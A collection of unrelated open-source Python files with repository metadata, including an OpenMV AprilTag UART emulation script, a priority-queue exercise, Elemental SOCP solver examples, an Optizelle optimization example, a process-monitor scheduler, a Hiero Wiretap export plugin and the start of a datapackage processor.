fsm_state = FSM_STATE_SERVO_CONTROL_2
s0_pan_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
elif fsm_state == FSM_STATE_SERVO_CONTROL_2:
fsm_state = FSM_STATE_SERVO_CONTROL_3
elif fsm_state == FSM_STATE_SERVO_CONTROL_3:
fsm_state = FSM_STATE_NONE
s1_tilt_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
elif fsm_state == FSM_STATE_CAMERA_CONTROL:
fsm_state = FSM_STATE_NONE
# Ignore...
elif fsm_state == FSM_STATE_LED_CONTROL_0:
fsm_state = FSM_STATE_LED_CONTROL_1
if byte & 0x80: red_led.on()
else: red_led.off()
elif fsm_state == FSM_STATE_LED_CONTROL_1:
fsm_state = FSM_STATE_LED_CONTROL_2
if byte & 0x80: green_led.on()
else: green_led.off()
elif fsm_state == FSM_STATE_LED_CONTROL_2:
fsm_state = FSM_STATE_NONE
if byte & 0x80: blue_led.on()
else: blue_led.off()
last_byte = byte
# Main Loop
clock = time.clock()
while(True):
clock.tick()
img = sensor.snapshot()
tags = img.find_apriltags() # default TAG36H11 family
# Transmit Tags #
if tags and (max_blocks > 0) and (max_blocks_per_id > 0): # new frame
dat_buf = struct.pack("<h", 0xAA55)
id_map = {}
first_b = False
for tag in sorted(tags, key = lambda x: x.area(), reverse = True)[0:max_blocks]:
if not tag.id() in id_map:
id_map[tag.id()] = 1
else:
id_map[tag.id()] += 1
if id_map[tag.id()] <= max_blocks_per_id:
dat_buf += to_object_block_format(tag)
img.draw_rectangle(tag.rect())
img.draw_cross(tag.cx(), tag.cy())
if dac and not first_b:
x_scale = 255 / (img.width()-1)
y_scale = 255 / (img.height()-1)
dac.write(round((tag.y() * y_scale) if analog_out_mode else (tag.x() * x_scale)))
first_b = True
dat_buf += struct.pack("<h", 0x0000)
write(dat_buf) # write all data in one packet...
else: # nothing found
write(struct.pack("<h", 0x0000))
if dac:
dac.write(0)
# Parse Commands #
for i in range(available()):
parse_byte(read_byte())
num_tags = min(len(tags), max_blocks)
print("%d tags(s) found - FPS %f" % (num_tags, clock.fps()))
| {
"repo_name": "kwagyeman/openmv",
"path": "scripts/examples/Arduino/Portenta-H7/17-Pixy-Emulation/apriltags_pixy_uart_emulation.py",
"copies": "5",
"size": "6591",
"license": "mit",
"hash": -3672161168331681000,
"line_mean": 28.0352422907,
"line_max": 103,
"alpha_frac": 0.6094674556,
"autogenerated": false,
"ratio": 2.869394862864606,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0058659656637859384,
"num_lines": 227
} |
#A priority queue is common implemented with a heap
"""
Basic operations:
1. insert_with_priority
2. pull_highest_priority_item
3. peek
Difference between heap and priority queue:
1. Heap is ONE implementation of a priority queue, and it's tree-based.
2. Priority Queue is an abstract data structure.
"""
import heapq
# heapq is a min heap, smallest item in the top
class PriorityQueue:
def __init__(self):
self._queue = []
self._index = 0
def push(self, item, priority):
heapq.heappush(self._queue, (-priority, self._index, item))
self._index += 1
def pop(self):
# heappop will return the smallest item
return heapq.heappop(self._queue)[-1]
class Node:
def __init__(self, data):
self.data = data
class pq:
def __init__(self):
self.queue = []
self.length = 0
def sift(self, root, n):
left = root*2 + 1
right = root*2 + 2
biggest = root
if left < n and self.queue[left].data > self.queue[root].data:
biggest = left
if right < n and self.queue[right].data > self.queue[biggest].data:
biggest = right
if biggest != root:
self.queue[root], self.queue[biggest] = self.queue[biggest], self.queue[root]
root = biggest
self.sift(root, self.length)
def heapify(self):
start = self.length/2 - 1
while start >= 0:
self.sift(start, self.length)
start -= 1
def insert(self, node):
self.queue.append(node)
self.length += 1
if self.length == 1:
return
self.heapify()
def pop(self):
node = self.queue[0]
non_node = Node(0)
self.queue[0] = non_node
for i in xrange(self.length/2 - 1):
self.sift(i, self.length)
return node
def peek(self):
return self.queue[0]
def __str__(self):
l = []
for node in self.queue:
l.append(str(node.data))
return ' '.join(l)
p = pq()
node1 = Node(1)
node2 = Node(2)
node3 = Node(3)
node4 = Node(4)
node5 = Node(5)
node6 = Node(6)
node7 = Node(7)
p.insert(node1)
print p
p.insert(node2)
p.insert(node3)
print p
p.insert(node4)
p.insert(node5)
p.insert(node6)
p.insert(node7)
print p
print p.pop().data
print p
print p.peek().data
| {
"repo_name": "armsky/Algorithms",
"path": "Data Structure/priorityQueue.py",
"copies": "1",
"size": "2385",
"license": "apache-2.0",
"hash": -3157268401486982700,
"line_mean": 22.1553398058,
"line_max": 89,
"alpha_frac": 0.572327044,
"autogenerated": false,
"ratio": 3.3310055865921786,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4403332630592178,
"avg_score": null,
"num_lines": null
} |
# A problematic SOC problem from CVXPY's tests.
import El
El.Initialize()
orders = El.DistMultiVec(El.iTag)
firstInds = El.DistMultiVec(El.iTag)
labels = El.DistMultiVec(El.iTag)
orders.Resize(21,1)
firstInds.Resize(21,1)
labels.Resize(21,1)
for c in xrange(7):
for i in xrange(3):
orders.Set(3*c+i,0,3)
firstInds.Set(3*c+i,0,3*c)
labels.Set(3*c+i,0,c)
h = El.DistMultiVec(El.dTag)
El.Zeros( h, 21, 1 )
h.Set( 3, 0, 1 )
h.Set( 4, 0, 1 )
h.Set( 6, 0, 1 )
h.Set( 7, 0, -1 )
h.Set( 11, 0, 2 )
h.Set( 12, 0, 1 )
h.Set( 13, 0, -1 )
c = El.DistMultiVec(El.dTag)
El.Zeros( c, 8, 1 )
c.Set( 1, 0, 1 )
G = El.DistSparseMatrix(El.dTag)
El.Zeros( G, 21, 8 )
G.Reserve( 28 )
G.QueueUpdate( 0, 3, -1 )
G.QueueUpdate( 0, 4, -1 )
G.QueueUpdate( 1, 3, -1 )
G.QueueUpdate( 1, 4, 1 )
G.QueueUpdate( 2, 2, -2 )
G.QueueUpdate( 3, 5, -1 )
G.QueueUpdate( 4, 5, 1 )
G.QueueUpdate( 5, 4, -2 )
G.QueueUpdate( 6, 1, -1 )
G.QueueUpdate( 7, 1, -1 )
G.QueueUpdate( 8, 6, -2 )
G.QueueUpdate( 9, 6, -1 )
G.QueueUpdate( 9, 7, -1 )
G.QueueUpdate( 10, 6, -1 )
G.QueueUpdate( 10, 7, 1 )
G.QueueUpdate( 12, 0, -1 )
G.QueueUpdate( 13, 0, -1 )
G.QueueUpdate( 14, 5, -2 )
G.QueueUpdate( 15, 2, -1 )
G.QueueUpdate( 15, 5, -1 )
G.QueueUpdate( 16, 2, 1 )
G.QueueUpdate( 16, 5, -1 )
G.QueueUpdate( 17, 7, -2 )
G.QueueUpdate( 18, 0, -1 )
G.QueueUpdate( 18, 1, -1 )
G.QueueUpdate( 19, 0, -1 )
G.QueueUpdate( 19, 1, 1 )
G.QueueUpdate( 20, 3, -2 )
G.ProcessQueues()
b = El.DistMultiVec(El.dTag)
b.Resize( 1, 1 )
b.Set( 0, 0, 7.45 )
A = El.DistSparseMatrix(El.dTag)
El.Zeros( A, 1, 8 )
A.Reserve( 1 )
A.QueueUpdate( 0, 0, 1 )
A.ProcessQueues()
x = El.DistMultiVec()
y = El.DistMultiVec()
z = El.DistMultiVec()
s = El.DistMultiVec()
ctrl = El.SOCPAffineCtrl_d()
ctrl.mehrotraCtrl.qsdCtrl.progress = True
ctrl.mehrotraCtrl.progress = True
ctrl.mehrotraCtrl.outerEquil = True
ctrl.mehrotraCtrl.time = True
El.SOCPAffine(A,G,b,c,h,orders,firstInds,labels,x,y,z,s,ctrl)
El.Finalize()
| {
"repo_name": "justusc/Elemental",
"path": "examples/interface/SOCAtom.py",
"copies": "1",
"size": "1966",
"license": "bsd-3-clause",
"hash": -8457385428055271000,
"line_mean": 21.8604651163,
"line_max": 61,
"alpha_frac": 0.6312309257,
"autogenerated": false,
"ratio": 2.0564853556485354,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.31877162813485355,
"avg_score": null,
"num_lines": null
} |
# A problematic SOC problem from CVXPY's tests.
import El
El.Initialize()
orders = El.DistMultiVec(El.iTag)
firstInds = El.DistMultiVec(El.iTag)
orders.Resize(21,1)
firstInds.Resize(21,1)
for c in xrange(7):
for i in xrange(3):
orders.Set(3*c+i,0,3)
firstInds.Set(3*c+i,0,3*c)
h = El.DistMultiVec(El.dTag)
El.Zeros( h, 21, 1 )
h.Set( 3, 0, 1 )
h.Set( 4, 0, 1 )
h.Set( 6, 0, 1 )
h.Set( 7, 0, -1 )
h.Set( 11, 0, 2 )
h.Set( 12, 0, 1 )
h.Set( 13, 0, -1 )
c = El.DistMultiVec(El.dTag)
El.Zeros( c, 8, 1 )
c.Set( 1, 0, 1 )
G = El.DistSparseMatrix(El.dTag)
El.Zeros( G, 21, 8 )
G.Reserve( 28 )
G.QueueUpdate( 0, 3, -1 )
G.QueueUpdate( 0, 4, -1 )
G.QueueUpdate( 1, 3, -1 )
G.QueueUpdate( 1, 4, 1 )
G.QueueUpdate( 2, 2, -2 )
G.QueueUpdate( 3, 5, -1 )
G.QueueUpdate( 4, 5, 1 )
G.QueueUpdate( 5, 4, -2 )
G.QueueUpdate( 6, 1, -1 )
G.QueueUpdate( 7, 1, -1 )
G.QueueUpdate( 8, 6, -2 )
G.QueueUpdate( 9, 6, -1 )
G.QueueUpdate( 9, 7, -1 )
G.QueueUpdate( 10, 6, -1 )
G.QueueUpdate( 10, 7, 1 )
G.QueueUpdate( 12, 0, -1 )
G.QueueUpdate( 13, 0, -1 )
G.QueueUpdate( 14, 5, -2 )
G.QueueUpdate( 15, 2, -1 )
G.QueueUpdate( 15, 5, -1 )
G.QueueUpdate( 16, 2, 1 )
G.QueueUpdate( 16, 5, -1 )
G.QueueUpdate( 17, 7, -2 )
G.QueueUpdate( 18, 0, -1 )
G.QueueUpdate( 18, 1, -1 )
G.QueueUpdate( 19, 0, -1 )
G.QueueUpdate( 19, 1, 1 )
G.QueueUpdate( 20, 3, -2 )
G.ProcessQueues()
b = El.DistMultiVec(El.dTag)
b.Resize( 1, 1 )
b.Set( 0, 0, 7.45 )
A = El.DistSparseMatrix(El.dTag)
El.Zeros( A, 1, 8 )
A.Reserve( 1 )
A.QueueUpdate( 0, 0, 1 )
A.ProcessQueues()
x = El.DistMultiVec()
y = El.DistMultiVec()
z = El.DistMultiVec()
s = El.DistMultiVec()
ctrl = El.SOCPAffineCtrl_d()
ctrl.mehrotraCtrl.qsdCtrl.progress = True
ctrl.mehrotraCtrl.progress = True
ctrl.mehrotraCtrl.outerEquil = True
ctrl.mehrotraCtrl.time = True
El.SOCPAffine(A,G,b,c,h,orders,firstInds,x,y,z,s,ctrl)
El.Finalize()
| {
"repo_name": "birm/Elemental",
"path": "examples/interface/SOCAtom.py",
"copies": "1",
"size": "1879",
"license": "bsd-3-clause",
"hash": 3789601035910219000,
"line_mean": 21.6385542169,
"line_max": 54,
"alpha_frac": 0.6279936136,
"autogenerated": false,
"ratio": 2.0513100436681224,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.7914356255110995,
"avg_score": 0.05298948043142533,
"num_lines": 83
} |
# A problematic SOC problem from CVXPY's tests.
import El
orders = El.DistMultiVec(El.iTag)
firstInds = El.DistMultiVec(El.iTag)
orders.Resize(21,1)
firstInds.Resize(21,1)
for c in xrange(7):
for i in xrange(3):
orders.Set(3*c+i,0,3)
firstInds.Set(3*c+i,0,3*c)
h = El.DistMultiVec(El.dTag)
El.Zeros( h, 21, 1 )
h.Set( 3, 0, 1 )
h.Set( 4, 0, 1 )
h.Set( 6, 0, 1 )
h.Set( 7, 0, -1 )
h.Set( 11, 0, 2 )
h.Set( 12, 0, 1 )
h.Set( 13, 0, -1 )
c = El.DistMultiVec(El.dTag)
El.Zeros( c, 8, 1 )
c.Set( 1, 0, 1 )
G = El.DistSparseMatrix(El.dTag)
El.Zeros( G, 21, 8 )
G.Reserve( 28 )
G.QueueUpdate( 0, 3, -1, passive=True )
G.QueueUpdate( 0, 4, -1, passive=True )
G.QueueUpdate( 1, 3, -1, passive=True )
G.QueueUpdate( 1, 4, 1, passive=True )
G.QueueUpdate( 2, 2, -2, passive=True )
G.QueueUpdate( 3, 5, -1, passive=True )
G.QueueUpdate( 4, 5, 1, passive=True )
G.QueueUpdate( 5, 4, -2, passive=True )
G.QueueUpdate( 6, 1, -1, passive=True )
G.QueueUpdate( 7, 1, -1, passive=True )
G.QueueUpdate( 8, 6, -2, passive=True )
G.QueueUpdate( 9, 6, -1, passive=True )
G.QueueUpdate( 9, 7, -1, passive=True )
G.QueueUpdate( 10, 6, -1, passive=True )
G.QueueUpdate( 10, 7, 1, passive=True )
G.QueueUpdate( 12, 0, -1, passive=True )
G.QueueUpdate( 13, 0, -1, passive=True )
G.QueueUpdate( 14, 5, -2, passive=True )
G.QueueUpdate( 15, 2, -1, passive=True )
G.QueueUpdate( 15, 5, -1, passive=True )
G.QueueUpdate( 16, 2, 1, passive=True )
G.QueueUpdate( 16, 5, -1, passive=True )
G.QueueUpdate( 17, 7, -2, passive=True )
G.QueueUpdate( 18, 0, -1, passive=True )
G.QueueUpdate( 18, 1, -1, passive=True )
G.QueueUpdate( 19, 0, -1, passive=True )
G.QueueUpdate( 19, 1, 1, passive=True )
G.QueueUpdate( 20, 3, -2, passive=True )
G.ProcessQueues()
b = El.DistMultiVec(El.dTag)
b.Resize( 1, 1 )
b.Set( 0, 0, 7.45 )
A = El.DistSparseMatrix(El.dTag)
El.Zeros( A, 1, 8 )
A.Reserve( 1 )
A.QueueUpdate( 0, 0, 1, passive=True )
A.ProcessQueues()
x = El.DistMultiVec()
y = El.DistMultiVec()
z = El.DistMultiVec()
s = El.DistMultiVec()
ctrl = El.SOCPAffineCtrl_d()
ctrl.mehrotraCtrl.solveCtrl.progress = True
ctrl.mehrotraCtrl.progress = True
ctrl.mehrotraCtrl.outerEquil = True
ctrl.mehrotraCtrl.time = True
El.SOCPAffine(A,G,b,c,h,orders,firstInds,x,y,z,s,ctrl)
El.Finalize()
| {
"repo_name": "mcopik/Elemental",
"path": "examples/interface/SOCAtom.py",
"copies": "2",
"size": "2271",
"license": "bsd-3-clause",
"hash": 6212352500490264000,
"line_mean": 26.6951219512,
"line_max": 54,
"alpha_frac": 0.6556583003,
"autogenerated": false,
"ratio": 2.2134502923976607,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.38691085926976604,
"avg_score": null,
"num_lines": null
} |
# A problem that helps us determine how to scale inequality constrained
# optimization problems
import Optizelle
import numpy
import sys
# Define a simple objective where
#
# f(x) = 0.5 || x - c ||^2
#
class MyObj(Optizelle.ScalarValuedFunction):
# Grab the center of the objective
def __init__(self, c):
self.c = c
# Evaluation
def eval(self,x):
diff = x - self.c
return 0.5*numpy.dot(diff,diff)
# Gradient
def grad(self,x,grad):
numpy.copyto(grad,x-self.c);
# Hessian-vector product
def hessvec(self,x,dx,H_dx):
numpy.copyto(H_dx,dx);
# Define simple inequalities
#
# h(x) = x - lb
#
class MyIneq(Optizelle.VectorValuedFunction):
# Grab the lower bound
def __init__(self, lb):
self.lb = lb
# z=h(x)
def eval(self,x,z):
numpy.copyto(z,x-lb);
# z=h'(x)dx
def p(self,x,dx,z):
numpy.copyto(z,dx);
# xhat=h'(x)*dz
def ps(self,x,dz,xhat):
numpy.copyto(xhat,dz);
# xhat=(h''(x)dx)*dz
def pps(self,x,dx,dz,xhat):
xhat.fill(0.)
# Read in the name for the input file
if len(sys.argv)!=2:
sys.exit("inequality_scaling.py <parameters>")
fname=sys.argv[1]
# Set the size
m = 10;
# Generate an initial guess
x = numpy.array([1.+10**(-x) for x in range(1,m+1)])
# Allocate memory for the inequality multiplier
z = numpy.array(m*[0.])
# Create the center of the objective function
c = numpy.array(m*[-1.])
# Create the lower bound for the problem
lb = numpy.array(m*[1.])
# Create an optimization state
state=Optizelle.InequalityConstrained.State.t(Optizelle.Rm,Optizelle.Rm,x,z)
# Read the parameters from file
Optizelle.json.InequalityConstrained.read(
Optizelle.Rm,Optizelle.Rm,fname,state)
# Create a bundle of functions
fns=Optizelle.InequalityConstrained.Functions.t()
fns.f=MyObj(c)
fns.h=MyIneq(lb)
# Solve the optimization problem
Optizelle.InequalityConstrained.Algorithms.getMin(
Optizelle.Rm,Optizelle.Rm,Optizelle.Messaging.stdout,fns,state)
# Print out the reason for convergence
print("The algorithm converged due to: %s" % (
Optizelle.OptimizationStop.to_string(state.opt_stop)))
# Print out the final answer
print("The optimal point is: [")
for i in range(m):
print("%1.16e" % state.x[i])
print("]")
# Write out the final answer to file
Optizelle.json.InequalityConstrained.write_restart(
Optizelle.Rm,Optizelle.Rm,"solution.json",state)
| {
"repo_name": "OptimoJoe/Optizelle",
"path": "src/examples/inequality_scaling/inequality_scaling.py",
"copies": "1",
"size": "2440",
"license": "bsd-2-clause",
"hash": 7245537966458875000,
"line_mean": 22.6893203883,
"line_max": 76,
"alpha_frac": 0.6717213115,
"autogenerated": false,
"ratio": 2.7853881278538815,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3957109439353882,
"avg_score": null,
"num_lines": null
} |
"""A process monitoring tool."""
import heapq
import itertools
import logging
import time
def generate_intervals(clock):
"""Generate a sequence of time intervals.
Each time ``next()`` is called, the generator yields the time interval
since the last value was requested."""
old = clock()
while True:
new = clock()
yield new - old
old = new
def local_stopwatch():
"""Generate time elapsed between iterations."""
return generate_intervals(time.clock)
def generate_deadlines(start, period, skip=0):
"""Generate a sequence of points in time at periodic intervals.
Each time ``next()`` is called, the generator yields the next deadline.
Note that the current time has no effect, so the generator yields values at
exactly ``period`` offsets of one another. This helps with regularity:
when a specific occurrence of a periodic timer is late, this does not
offset all subsequent deadlines (the timer will "catch up" so to speak)."""
while True:
if skip > 0:
skip -= 1
else:
yield start
start += period
class Scheduler(object):
"""Efficient clock-agnostic tool to defer actions."""
def __init__(self):
self.queue = []
self.index = itertools.count(start=1)
def next_deadline(self):
"""Quickly determine when the next action is due.
The ``AllSeeingEye`` uses this to efficiently determine how long to
wait until the next iteration of ``elapsed()``, all but avoiding the
need for polling."""
if len(self.queue) < 1:
return None
return self.queue[0][0]
def schedule(self, deadline, action):
"""Defer ``action`` for execution at ``deadline``.
When ``deadline`` is reached, ``action`` will be queued into the
``elapsed`` iterable so that the caller can use the action."""
heapq.heappush(self.queue, (deadline, next(self.index), action))
def elapsed(self, now):
"""Enumerate all actions who'se deadlines elasped before ``now``.
Actions are enumerated in order of elasped deadline, and in insertion
order for equal deadlines, guaranteeing FIFO-like behavior of deferred
actions, all the while respecting time constraints."""
while len(self.queue) > 0 and now >= self.queue[0][0]:
yield heapq.heappop(self.queue)[2]
class AllSeeingEye(object):
"""Efficient monitor aggregation."""
def __init__(self, clock=time.clock):
self.monitors = {}
self.scheduler = Scheduler()
self.clock = clock
def time_to_wait(self):
"""Time to wait, in seconds."""
deadline = self.scheduler.next_deadline()
if deadline is None:
return None
return deadline - self.clock()
def watching(self, label):
"""Check if the all seeing eye is watching ``label``."""
return label in self.monitors
def watch(self, label, monitor, period, notify):
"""Register for polling"""
if self.watching(label):
raise KeyError('Already watching "%s".' % label)
deadlines = generate_deadlines(self.clock(), period, skip=1)
def action():
"""Invoke the notification function and auto-reregister."""
try:
# Auto-cancel when desired.
if notify(monitor()):
self.scheduler.schedule(next(deadlines), action)
else:
del self.monitors[label]
except Exception: # pylint: disable=broad-except
logging.exception('Polling "%s".', label)
self.scheduler.schedule(next(deadlines), action)
self.monitors[label] = monitor
def blink(self):
"""Dispatch actions for all ready monitors."""
count = 0
for action in self.scheduler.elapsed(self.clock()):
action()
count += 1
return count
| {
"repo_name": "AndreLouisCaron/spectator",
"path": "spectator/__init__.py",
"copies": "1",
"size": "3993",
"license": "bsd-2-clause",
"hash": -8731470144121904000,
"line_mean": 32.275,
"line_max": 79,
"alpha_frac": 0.6133233158,
"autogenerated": false,
"ratio": 4.4614525139664805,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5574775829766481,
"avg_score": null,
"num_lines": null
} |
"""A processor for sending shots to an Autodesk IFFFS server (Stone FS) via
Wiretap.
@author Brendan Holt
@date May 2014
@defgroup modFnWiretapShotProcessor FnWiretapShotProcessor
@{
"""
import os.path
import hiero.core
from hiero.exporters.FnShotProcessor import ShotProcessor, ShotProcessorPreset
import hiero.ui
from PySide import QtCore, QtGui
import Path
import FnStonify
import FnWiretapShotProcessorUI
from WiretapBrowser import ChooseContainerNode
from WiretapTools import SplitHostname
class WiretapShotProcessor(ShotProcessor):
"""A custom Hiero shot processor that works in tandem with the Stonify task
and provides a streamlined interface for translating Wiretap node paths
into appropriate export structures.
"""
def __init__(self, preset, submission=None, synchronous=False):
"""Initializes the Wiretap shot processor given a preset and submission
information.
@param[in] preset \c{(WiretapShotProcessorPreset)} The preset
associated with this shot processor.
@param[in] submission \c{(hiero.exporters.FnSubmission.Submission)} The
submission task group used for spawning tasks.
@param[in] synchronous \c{(bool)} Whether spawned tasks should be
processed synchronously.
"""
super(WiretapShotProcessor, self).__init__(preset, submission,
synchronous)
def displayName(self):
"""The label for this shot processor as it should appear in the export
dialog.
@return \c{(str)} The display name for this shot processor.
"""
return "Wiretap Shot Processor"
def toolTip(self):
"""A pop-up summary of this feature when the mouse hovers over the
processor selection in the export dialog.
@return \c{(str)} The tooltip for this shot processor.
"""
return ("The Wiretap Shot Processor sends supported video/frame "
"formats to a Stone FS.")
def populateUI(self, widget, exportItems, editMode=None):
"""Inserts custom Qt widgets above the export structure viewer for
selecting a Wiretap destination node.
@param[in] widget \c{(QtGui.QWidget)} The parent widget that will
contain GUI controls exposed for this processor.
@param[in] exportItems \c{(list)} The media selected in the Hiero
interface to be exported. Each item is wrapped
as a \c{hiero.core.ItemWrapper} instance.
@param[in] editMode \c{(hiero.ui.IProcessorUI.EditMode)} Whether to
expose the full UI (Hiero) or a limited subset
(HieroPlayer).
"""
layout = QtGui.QVBoxLayout(widget)
layout.setContentsMargins(0, 0, 0, 0)
header = ProcessorHeader()
defaultForm = QtGui.QWidget()
layout.addWidget(header)
layout.addWidget(defaultForm)
super(WiretapShotProcessor, self).populateUI(defaultForm, exportItems,
editMode)
header.exportTemplate = self._exportTemplate
header.exportStructureViewer = self._exportStructureViewer
def startProcessing(self, exportItems):
"""Adds an entry to the CBSD usage log before processing the selected
export items.
@param[in] exportItems \c{(list)} The media selected in the Hiero
interface to be exported. Each item is wrapped
as a \c{hiero.core.ItemWrapper} instance.
"""
super(WiretapShotProcessor, self).startProcessing(exportItems)
def validate(self, exportItems):
"""Modified version of Hiero's validation routine that does not enforce
the requirement of an existing project root on a standard file system
if there are only Stonify tasks in the export structure.
@param[in] exportItems \c{(list)} The media selected in the Hiero
interface to be exported. Each item is wrapped
as a \c{hiero.core.ItemWrapper} instance.
@see \c{hiero.exporters.FnShotProcessor.ShotProcessor.validate()}
@see \c{hiero.ui.FnProcessorUI.ProcessorUIBase.validate()}
"""
# Do the standard validation if any non-Stonify tasks are present
doStandardValidation = False
for exportPath, preset in self._exportTemplate.flatten():
# NOTE: isinstance() sometimes fails to match a valid object type
# (maybe because FnStonify.py is loaded as a plugin?)
if type(preset) is not FnStonify.StonifyPreset:
doStandardValidation = True
else:
# Set a flag on Stonify presets to let the task know that it is
# being executed by the Wiretap Shot Processor
preset.setPropertiesValue('isWiretapShotProcess', True)
if doStandardValidation:
return super(WiretapShotProcessor, self).validate(exportItems)
# Since only Stonify tasks are present, perform almost the same
# validation as the standard shot processor, except do not check
# whether the project root has been set.
# Copied from FnShotProcessor.py
invalidItems = []
# Look for selected items which aren't of the correct type
for item in exportItems:
if not item.sequence() and not item.trackItem():
invalidItems.append(item.item().name() +
" <span style='color: #CC0000'>"
"(Not a Sequence)</span>")
# Found invalid items
if invalidItems:
# Show warning
msgBox = QtGui.QMessageBox()
msgBox.setTextFormat(QtCore.Qt.RichText)
result = msgBox.information(
None, "Export",
"The following items will be ignored by this export:<br/>%s"
% str("<br/>".join(invalidItems)),
QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel)
# Continue if user clicks OK
return result == QtGui.QMessageBox.Ok
# Copied from FnProcessorUI.py
# Check for offline track items
if not self.checkOfflineMedia(exportItems):
return False
# Do any ShotProcessor-specific validation here...
return True
class ProcessorHeader(QtGui.QWidget, FnWiretapShotProcessorUI.Ui_Form):
"""A custom header for the Wiretap shot processor that is inserted above
the export structure viewer.
"""
def __init__(self):
"""Initializes the header UI for the Wiretap shot processor section of
the export dialog.
"""
super(ProcessorHeader, self).__init__()
self.setupUi(self)
self.layout().setContentsMargins(0, 0, 0, 0)
# Override path to CBSD logo
logoPath = os.path.join(os.path.dirname(__file__),
'../resources/images/cbsd_logo.png')
logoPath = os.path.normpath(logoPath)
self.logoLabel.setPixmap(QtGui.QPixmap(logoPath))
self.notesLabel.setSizePolicy(QtGui.QSizePolicy.Preferred,
QtGui.QSizePolicy.Ignored)
## \c{(bool)} Whether additional instructions related to the shot
# processor configuration are visible.
self.notesVisible = False
## \c{(hiero.core.FnExportStructure.ExportStructure2)} A reference to
# the current preset's export template.
#
# @details Set externally by WiretapShotProcessor.populateUI().
self.exportTemplate = None
## \c{(hiero.ui.ExportStructureViewer)} A reference to the Wiretap shot
# processor's export structure viewer.
#
# @details Set externally by WiretapShotProcessor.populateUI().
self.exportStructureViewer = None
# Signal-slot pairs
self.notesButton.clicked.connect(self.ToggleNotes)
self.chooseButton.clicked.connect(self.ChooseNodePath)
self.clipNameEdit.textEdited.connect(self.__FixClipName)
self.addElementButton.clicked.connect(self.AddElement)
#--------------------------------------------------------------------------
# SLOTS
#--------------------------------------------------------------------------
def ToggleNotes(self):
"""Toggles the visibility of additional usage notes displayed in the
processor header.
@details This method is a Qt slot for when the expand/collapse notes
button is clicked.
"""
if self.notesVisible:
self.notesButton.setText('Notes [+]')
self.notesLabel.setSizePolicy(QtGui.QSizePolicy.Preferred,
QtGui.QSizePolicy.Ignored)
self.notesVisible = False
else:
self.notesButton.setText(u'Notes [\u2212]') # minus (not hyphen)
self.notesLabel.setSizePolicy(QtGui.QSizePolicy.Preferred,
QtGui.QSizePolicy.Preferred)
self.notesVisible = True
def ChooseNodePath(self):
"""Launches a Wiretap browser and displays the selected node path upon
return.
@details This method is a Qt slot for when the "Choose..." (Wiretap
library or reel) button is clicked.
"""
nodePath = ChooseContainerNode()
if nodePath:
self.nodePathEdit.setText(nodePath)
def __FixClipName(self, text):
"""Provides dynamic text substitutions and constraints when editing the
clip name.
@details This method is a Qt slot for when the contents of the clip
name text box are manually edited.
"""
substitutions = {
'/': '',
'\\': ''
}
cursorPos = self.clipNameEdit.cursorPosition()
for char in substitutions:
text = text.replace(char, substitutions[char])
self.clipNameEdit.setText(text)
self.clipNameEdit.setCursorPosition(cursorPos)
def AddElement(self):
"""Converts a Wiretap node path into an export structure and updates
the export structure viewer with the new hierarchy.
@details There is minimal path syntax checking in this method. The
Wiretap Browser will usually fix most typos.
@throws Raises a <a href="http://docs.python.org/2.6/library/exceptions.html#exceptions.TypeError" target="_blank">
TypeError</a> if the export structure viewer was not properly
set by WiretapShotProcessor.populateUI().
"""
if not self.exportStructureViewer:
raise TypeError("Please connect the shot processor's export "
"structure viewer to this header instance.")
# Don't discard double slashes at end to allow for unnamed nodes.
segments = [seg for seg in self.nodePathEdit.text().split('/')]
hostname = SplitHostname(segments[0])[0] # drop "IFFFS"
# Require a clip name
# NOTE: The actual path requirements for uploading to a Wiretap IFFFS
# server are more strict, but path validation happens elsewhere.
clipName = self.clipNameEdit.text().strip()
if clipName:
segments.append(clipName)
elementPath = Path.Join(hostname, *segments[1:])
# Populate export structure
root = self.exportTemplate.rootElement()
if clipName:
root.createChild(elementPath, True)
leaf = root[elementPath]
# Add preset to leaf element
# NOTE: Be sure to update the string representation of the Stonify
# task if the module or class name changes.
preset = FnStonify.StonifyPreset(name='FnStonify.StonifyTask',
properties={})
if leaf is not None:
leaf.setPreset(preset)
else:
print("WARNING: Unable to set Stonify content on element " +
elementPath)
elif elementPath:
root.createChild(elementPath, False)
self.exportStructureViewer.refresh()
class WiretapShotProcessorPreset(ShotProcessorPreset):
"""Stores settings for use with the Wiretap shot processor and its
corresponding UI class that augments the export dialog interface.
"""
def __init__(self, name, properties):
"""Sets up the Wiretap shot processor preset with default properties.
@param[in] name \c{(str)} The preset name, usually handled
automatically by Hiero.
@param[in] properties \c{(dict)} Preset properties to be updated.
"""
super(WiretapShotProcessorPreset, self).__init__(name, properties)
# Necessary in order for Hiero to view this plugin as different from
# the default shot processor
self._parentType = WiretapShotProcessor
hiero.core.taskRegistry.registerProcessor(WiretapShotProcessorPreset,
WiretapShotProcessor)
hiero.ui.taskUIRegistry.registerProcessorUI(WiretapShotProcessorPreset,
WiretapShotProcessor)
## @}
| {
"repo_name": "CBSDigital/Hiero-Wiretap",
"path": "plugins/FnWiretapShotProcessor.py",
"copies": "1",
"size": "13979",
"license": "bsd-3-clause",
"hash": 6283784788254564000,
"line_mean": 39.9941348974,
"line_max": 123,
"alpha_frac": 0.5928177981,
"autogenerated": false,
"ratio": 4.639561898440093,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5732379696540093,
"avg_score": null,
"num_lines": null
} |
"""A processor to convert the description file into a datapackage."""
import json
import logging
import arrow
import yaml
from parser import ParserError
from slugify import slugify
from datapackage_pipelines.wrapper import spew, ingest
from common.config import SOURCE_FILE, SOURCE_DATAPACKAGE_FILE, JSON_FORMAT
from datapackage_pipelines.utilities.resources import PROP_STREAMING
def save_to_file(datapackage):
"""Save the datapackage dictionary to JSON.
"""
with open(SOURCE_DATAPACKAGE_FILE, 'w+') as stream:
stream.write(json.dumps(datapackage, indent=4, ensure_ascii=False))
